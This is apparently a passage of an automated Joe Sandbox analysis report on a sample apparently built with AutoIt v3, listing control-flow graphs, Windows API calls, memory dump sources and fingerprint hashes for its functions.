7ff655ffeaf0-7ff655ffeb22 call 7ff655fea07c call 7ff655fff08c call 7ff655fe39bc 247->252 253 7ff655ffed09-7ff655ffed18 call 7ff6560042a0 247->253 260 7ff656042905 248->260 250->244 273 7ff655ffeb24-7ff655ffeb29 call 7ff656004c24 252->273 274 7ff655ffeb2e-7ff655ffebc4 call 7ff655fe39bc call 7ff655fea07c call 7ff655fe45c8 * 2 call 7ff655fea07c * 3 call 7ff655ff13e0 call 7ff655ffee68 call 7ff655ffee2c * 3 252->274 253->252 265 7ff655ffed1e 253->265 266 7ff65604290a-7ff656042919 call 7ff656053a78 260->266 265->253 272 7ff65604291b 266->272 277 7ff656042920-7ff65604292f call 7ff655ffe4e4 272->277 273->274 274->266 316 7ff655ffebca-7ff655ffebdc call 7ff655fe39bc 274->316 284 7ff656042931 277->284 287 7ff656042936-7ff656042945 call 7ff656063078 284->287 292 7ff656042947 287->292 295 7ff65604294c-7ff65604295b call 7ff6560631a8 292->295 301 7ff65604295d 295->301 304 7ff656042962-7ff656042971 call 7ff6560631a8 301->304 310 7ff656042973 304->310 310->310 316->277 319 7ff655ffebe2-7ff655ffebec 316->319 319->287 320 7ff655ffebf2-7ff655ffec08 call 7ff655fea07c 319->320 323 7ff655ffed20-7ff655ffed25 call 7ff656004c24 320->323 324 7ff655ffec0e-7ff655ffec18 320->324 323->191 326 7ff655ffec8a-7ff655ffeca9 call 7ff655fea07c call 7ff656004c24 324->326 327 7ff655ffec1a-7ff655ffec24 324->327 338 7ff655ffecab 326->338 327->295 330 7ff655ffec2a-7ff655ffec3b 327->330 330->304 332 7ff655ffec41-7ff655ffed71 call 7ff655fea07c * 3 call 7ff655ffee10 call 7ff655ffed8c 330->332 347 7ff656042978-7ff656042987 call 7ff65606d794 332->347 348 7ff655ffed77-7ff655ffed88 332->348 338->327 351 7ff656042989 347->351 351->351
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 1992507300-3243417748
                                                                                                                    • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction ID: 3f453312b7961b9db57284ff8ddbdb82222f601a5067909d5f79fbf7e152f949
                                                                                                                    • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction Fuzzy Hash: 90E13D25B0A94281EEA8EB16C65427C2360BF94F49F4C5035DB4EB7691DF7DEC66CB00
                                                                                                                    Function 00007FF655FE3B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3
                                                                                                                    • API String ID: 423443420-1704141276
                                                                                                                    • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction ID: 7bcdef326dd6dd18747dc53350eed8b14e14dfeac29c6f2a5bff125283287dbe
                                                                                                                    • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction Fuzzy Hash: B7313936A08B028AE740CF51F9447AA3375FB48B58F484239CA8EA3B54DF7EE458C740
                                                                                                                    Function 00007FF656027348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 419 7ff656027348-7ff6560273ba call 7ff656027078 422 7ff6560273bc-7ff6560273c4 call 7ff6560155b4 419->422 423 7ff6560273d3-7ff6560273dd call 7ff65601e418 419->423 430 7ff6560273c7-7ff6560273ce call 7ff6560155d4 422->430 428 7ff6560273f7-7ff656027463 CreateFileW 423->428 429 7ff6560273df-7ff6560273f5 call 7ff6560155b4 call 7ff6560155d4 423->429 432 7ff656027469-7ff656027470 428->432 433 7ff6560274eb-7ff6560274f6 GetFileType 428->433 429->430 447 7ff65602771a-7ff656027736 430->447 436 7ff6560274b8-7ff6560274e6 GetLastError call 7ff656015564 432->436 437 7ff656027472-7ff656027476 432->437 439 7ff656027549-7ff65602754f 433->439 440 7ff6560274f8-7ff656027533 GetLastError call 7ff656015564 CloseHandle 433->440 436->430 437->436 445 7ff656027478-7ff6560274b6 CreateFileW 437->445 443 7ff656027556-7ff656027559 439->443 444 7ff656027551-7ff656027554 439->444 440->430 453 7ff656027539-7ff656027544 call 7ff6560155d4 440->453 450 7ff65602755e-7ff6560275ac call 7ff65601e334 443->450 451 7ff65602755b 443->451 444->450 445->433 445->436 458 7ff6560275ae-7ff6560275ba call 7ff656027284 450->458 459 7ff6560275c0-7ff6560275ea call 7ff656026de4 450->459 451->450 453->430 466 7ff6560275bc 458->466 467 7ff6560275ef-7ff6560275f9 call 7ff6560204b8 458->467 464 7ff6560275ec 459->464 465 7ff6560275fe-7ff656027643 459->465 464->467 469 7ff656027665-7ff656027671 465->469 470 7ff656027645-7ff656027649 465->470 466->459 467->447 473 7ff656027677-7ff65602767b 469->473 474 7ff656027718 469->474 470->469 472 7ff65602764b-7ff656027660 470->472 472->469 473->474 475 7ff656027681-7ff6560276c9 CloseHandle CreateFileW 473->475 474->447 476 7ff6560276cb-7ff6560276f9 GetLastError call 7ff656015564 call 7ff65601e548 475->476 477 7ff6560276fe-7ff656027713 475->477 476->477 477->474
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617910340-0
                                                                                                                    • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction ID: e1391a6ab6d17d913a469803e0aea80aca8325ff8e73245aec2bc8bafacb58e2
                                                                                                                    • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction Fuzzy Hash: 98C1BF32B18A418AEB508F65DA913BC3761FB497A8F085235DE2EAB7D5DF39D059C300
                                                                                                                    Function 00007FF655FF25BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 557 7ff655ff25bc-7ff655ff263d 561 7ff655ff2643-7ff655ff267c 557->561 562 7ff655ff287e-7ff655ff28af 557->562 563 7ff655ff2680-7ff655ff2687 561->563 565 7ff655ff268d-7ff655ff26a1 563->565 566 7ff655ff2856-7ff655ff2876 563->566 568 7ff65603d148-7ff65603d14f 565->568 569 7ff655ff26a7-7ff655ff26bc 565->569 566->562 570 7ff655ff2702-7ff655ff2723 568->570 571 7ff65603d155 568->571 572 7ff655ff26c2-7ff655ff26c9 569->572 573 7ff655ff29c8-7ff655ff29eb PeekMessageW 569->573 589 7ff655ff2725-7ff655ff272c 570->589 590 7ff655ff276e-7ff655ff27d2 570->590 578 7ff65603d15a-7ff65603d160 571->578 572->573 576 7ff655ff26cf-7ff655ff26d4 572->576 574 7ff655ff29f1-7ff655ff29f5 573->574 575 7ff655ff26e8-7ff655ff26ef 573->575 579 7ff65603d1aa-7ff65603d1bb 574->579 580 7ff655ff29fb-7ff655ff2a05 574->580 582 7ff655ff26f5-7ff655ff26fc 575->582 583 7ff65603e285-7ff65603e293 575->583 576->573 581 7ff655ff26da-7ff655ff26e2 GetInputState 576->581 585 7ff65603d19b 578->585 586 7ff65603d162-7ff65603d176 578->586 579->575 580->578 587 7ff655ff2a0b-7ff655ff2a1d call 7ff656002de8 580->587 581->573 581->575 582->570 588 7ff65603e29d-7ff65603e2b5 call 7ff655fff1c4 582->588 583->588 585->579 586->585 591 7ff65603d178-7ff65603d17f 586->591 604 7ff655ff2a33-7ff655ff2a4f PeekMessageW 587->604 605 7ff655ff2a1f-7ff655ff2a2d TranslateMessage DispatchMessageW 587->605 588->566 589->590 595 7ff655ff272e-7ff655ff2738 589->595 627 7ff65603e276 590->627 628 7ff655ff27d8-7ff655ff27da 590->628 591->585 597 7ff65603d181-7ff65603d190 TranslateAcceleratorW 591->597 596 7ff655ff273f-7ff655ff2742 595->596 601 7ff655ff28b0-7ff655ff28b7 596->601 602 7ff655ff2748 596->602 597->587 603 7ff65603d196 597->603 609 7ff655ff28eb-7ff655ff28ef 601->609 610 7ff655ff28b9-7ff655ff28cc timeGetTime 601->610 607 7ff655ff274f-7ff655ff2752 602->607 603->604 604->575 611 7ff655ff2a55 604->611 605->604 612 7ff655ff28f4-7ff655ff28fb 607->612 613 7ff655ff2758-7ff655ff2761 607->613 609->596 615 7ff655ff28d2-7ff655ff28d7 610->615 616 7ff65603d2ab-7ff65603d2b0 610->616 611->574 617 7ff65603d2f8-7ff65603d303 612->617 618 7ff655ff2901-7ff655ff2905 612->618 619 7ff65603d4c7-7ff65603d4ce 613->619 620 7ff655ff2767 613->620 622 7ff655ff28dc-7ff655ff28e5 615->622 623 7ff655ff28d9 615->623 616->622 624 7ff65603d2b6 616->624 625 7ff65603d309-7ff65603d30c 617->625 626 7ff65603d305 617->626 618->607 620->590 622->609 629 7ff65603d2bb-7ff65603d2f3 timeGetTime call 7ff656002ac0 call 7ff656063a28 622->629 623->622 624->629 631 7ff65603d30e 625->631 632 7ff65603d312-7ff65603d319 625->632 626->625 627->583 628->627 633 7ff655ff27e0-7ff655ff27ee 628->633 629->609 631->632 635 7ff65603d31b 632->635 636 7ff65603d322-7ff65603d329 632->636 633->627 637 7ff655ff27f4-7ff655ff2819 633->637 635->636 639 7ff65603d32b 636->639 640 7ff65603d332-7ff65603d33d call 7ff6560042a0 636->640 641 7ff655ff281f-7ff655ff2829 call 7ff655ff2b70 637->641 642 7ff655ff290a-7ff655ff290d 637->642 639->640 640->602 640->619 652 7ff655ff282e-7ff655ff2836 641->652 644 7ff655ff2931-7ff655ff2933 642->644 645 7ff655ff290f-7ff655ff291a call 7ff655ff2e30 642->645 649 7ff655ff2935-7ff655ff2949 call 7ff655ff66c0 644->649 650 7ff655ff2971-7ff655ff2974 644->650 645->652 664 7ff655ff294e-7ff655ff2950 649->664 657 7ff655ff297a-7ff655ff2997 call 7ff655ff01a0 650->657 658 7ff65603dfbe-7ff65603dfc0 650->658 653 7ff655ff299e-7ff655ff29ab 652->653 654 7ff655ff283c 652->654 659 7ff655ff29b1-7ff655ff29be call 7ff656004c24 653->659 660 7ff65603e181-7ff65603e197 call 7ff656004c24 * 2 653->660 661 7ff655ff2840-7ff655ff2843 654->661 674 7ff655ff299c 657->674 662 7ff65603dfed-7ff65603dff6 658->662 663 7ff65603dfc2-7ff65603dfc5 658->663 659->573 660->627 668 7ff655ff2849-7ff655ff2850 661->668 669 7ff655ff2b17-7ff655ff2b1d 661->669 671 7ff65603dff8-7ff65603e003 662->671 672 7ff65603e005-7ff65603e00c 662->672 663->661 670 7ff65603dfcb-7ff65603dfe7 call 7ff655ff3c20 663->670 664->652 673 7ff655ff2956-7ff655ff2966 664->673 668->563 668->566 669->668 680 7ff655ff2b23-7ff655ff2b2d 669->680 670->662 678 7ff65603e00f-7ff65603e016 call 7ff656078b98 671->678 672->678 673->652 679 7ff655ff296c 673->679 674->664 689 7ff65603e0d7-7ff65603e0d9 678->689 690 7ff65603e01c-7ff65603e036 call 7ff6560634e4 678->690 684 7ff65603e0f4-7ff65603e10e call 7ff6560634e4 679->684 680->568 691 7ff65603e147-7ff65603e14e 684->691 692 7ff65603e110-7ff65603e11d 684->692 693 7ff65603e0db 689->693 694 7ff65603e0df-7ff65603e0ee call 7ff65607a320 689->694 705 7ff65603e038-7ff65603e045 690->705 706 7ff65603e06f-7ff65603e076 690->706 691->668 698 7ff65603e154-7ff65603e15a 691->698 696 7ff65603e11f-7ff65603e130 call 7ff656004c24 * 2 692->696 697 7ff65603e135-7ff65603e142 call 7ff656004c24 692->697 693->694 694->684 696->697 697->691 698->668 703 7ff65603e160-7ff65603e169 698->703 703->660 707 7ff65603e047-7ff65603e058 call 7ff656004c24 * 2 705->707 708 7ff65603e05d-7ff65603e06a call 7ff656004c24 705->708 706->668 710 7ff65603e07c-7ff65603e082 706->710 707->708 708->706 710->668 715 7ff65603e088-7ff65603e091 710->715 715->689
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249950245-0
                                                                                                                    • Opcode ID: c7d32891da0a11719ef148ae5cbd4a4eccabf8e97de4c4234c4fe7d7b0c1946d
                                                                                                                    • Instruction ID: 6309f351d0fd708f53a3392d9c0ac15e4260353d0aa596d0c0b341480fdb5742
                                                                                                                    • Opcode Fuzzy Hash: c7d32891da0a11719ef148ae5cbd4a4eccabf8e97de4c4234c4fe7d7b0c1946d
                                                                                                                    • Instruction Fuzzy Hash: 1722A436A0C68286EB658F60E9547BD37A1FF41B48F584136D64EA36D5CF3DE849CB00
                                                                                                                    Function 00007FF655FE3CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 849 7ff655fe3cbc-7ff655fe3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Show
                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                    • API String ID: 2813641753-2600919596
                                                                                                                    • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction ID: b102ed3e699ec47176c741cf6db52d6cc327c61ef9e605e269bc3c346c0bd097
                                                                                                                    • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction Fuzzy Hash: AD215C72A28B4187EB10CF11F44872A77B1F788799F544238E68E97654DFBED049CB00
                                                                                                                    Function 00007FF656005244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2117695475-0
                                                                                                                    • Opcode ID: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                                                    • Instruction ID: 9e560f1a71589a38824ace5261868ac64bfbcb073b5a2e0fa5784fef704b4c7c
                                                                                                                    • Opcode Fuzzy Hash: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                                                                    • Instruction Fuzzy Hash: 63118300E0865385FA967BF19B562BC12918F45325FDC0938E51DF62C3DE6FB84DC266
                                                                                                                    Function 00007FF655FE7EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002D8E
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002D9C
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DAC
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DBC
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DCA
                                                                                                                      • Part of subcall function 00007FF656002D5C: MapVirtualKeyW.USER32(?,?,?,00007FF655FE7FA5), ref: 00007FF656002DD8
                                                                                                                      • Part of subcall function 00007FF655FFEEC8: RegisterWindowMessageW.USER32 ref: 00007FF655FFEF76
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF655FE8209
                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF655FE828F
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF655FE106D), ref: 00007FF65602D36A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: AutoIt
                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                    • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction ID: 0ea1fbaa1a47f1ba128d2309f00c2af5576f1fdf10b9aecb960ca208abb00c09
                                                                                                                    • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction Fuzzy Hash: 52C1CE70D19B4295E7409F14EA800BA77B8FF94744F98133AD48EE2661DF7EA588CB90
                                                                                                                    Function 00007FF655FE72C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                    • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction ID: 4091f085ba3968fb1078bf6a90c2f6101a3bbb3c3c345cd172f7b4fce9390217
                                                                                                                    • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction Fuzzy Hash: DC419665A0D68396EBA0DF10D9442FA3361FF84748F885031D68DA369ADF7DDD48CB40
                                                                                                                    Function 00007FF655FE3F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF65602BAA2
                                                                                                                      • Part of subcall function 00007FF655FE56D4: GetFullPathNameW.KERNEL32(?,00007FF655FE56C1,?,00007FF655FE7A0C,?,?,?,00007FF655FE109E), ref: 00007FF655FE56FF
                                                                                                                      • Part of subcall function 00007FF655FE3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF655FE3ED8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                    • API String ID: 779396738-2360590182
                                                                                                                    • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction ID: 4e43fd7493255c539890bc2ccc5980fa0129f93267731c529f8fab0c01b680a9
                                                                                                                    • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction Fuzzy Hash: 0831AF36608B8289E750DF21E9441AD77B8FB49B88F584135DE8C93B95DF3DD949CB00
                                                                                                                    Function 00007FF656004610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
